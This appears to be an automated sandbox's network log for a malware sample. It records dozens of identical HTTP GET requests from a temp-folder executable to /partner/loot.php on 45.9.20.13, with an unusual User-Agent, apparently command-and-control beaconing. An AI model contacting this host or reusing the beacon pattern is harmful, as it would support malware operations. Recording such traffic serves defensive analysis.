                                      9192.168.2.46000645.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:58:34.238300085 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.46001045.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:58:38.254776955 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.46001345.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:58:42.281301022 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.46001545.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:58:46.298897982 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.46001845.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:58:50.315246105 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.46002245.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:58:54.334098101 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.46002445.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:58:58.348725080 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.46002745.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:02.360569954 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.46003145.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:06.421536922 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.46003345.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:10.583111048 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.46003645.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:14.596736908 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.46004045.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:18.615184069 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.46004345.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:22.632713079 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.46004545.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:26.641937017 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.46004845.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:31.010417938 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.46005245.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:35.036703110 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.46005545.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:39.182205915 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.46005745.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:43.212670088 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.46006145.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:47.230123997 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.46006345.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:51.252470970 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.46006645.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:55.336297989 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.46007045.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 10:59:59.347681999 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.46007345.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:03.662852049 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.46007645.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:07.657536030 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.46007845.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:11.684684992 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.46008245.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:15.708468914 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.46008545.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:20.270778894 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.46008845.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:24.286206961 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.2.46009145.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:28.304342031 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.2.46009345.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:33.303833008 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.2.46009745.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:37.315577984 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.2.46010145.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:41.617697954 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      41192.168.2.46010345.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:45.645688057 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.2.46010645.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:49.659532070 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.2.46011045.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:53.676177025 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.2.46011345.9.20.13808076C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 21, 2024 11:00:57.847359896 CEST419OUTGET /partner/loot.php?pub=mixone HTTP/1.1
                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                      User-Agent: PJ-BQ-uz-Hc-7-y
                                      Host: 45.9.20.13
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
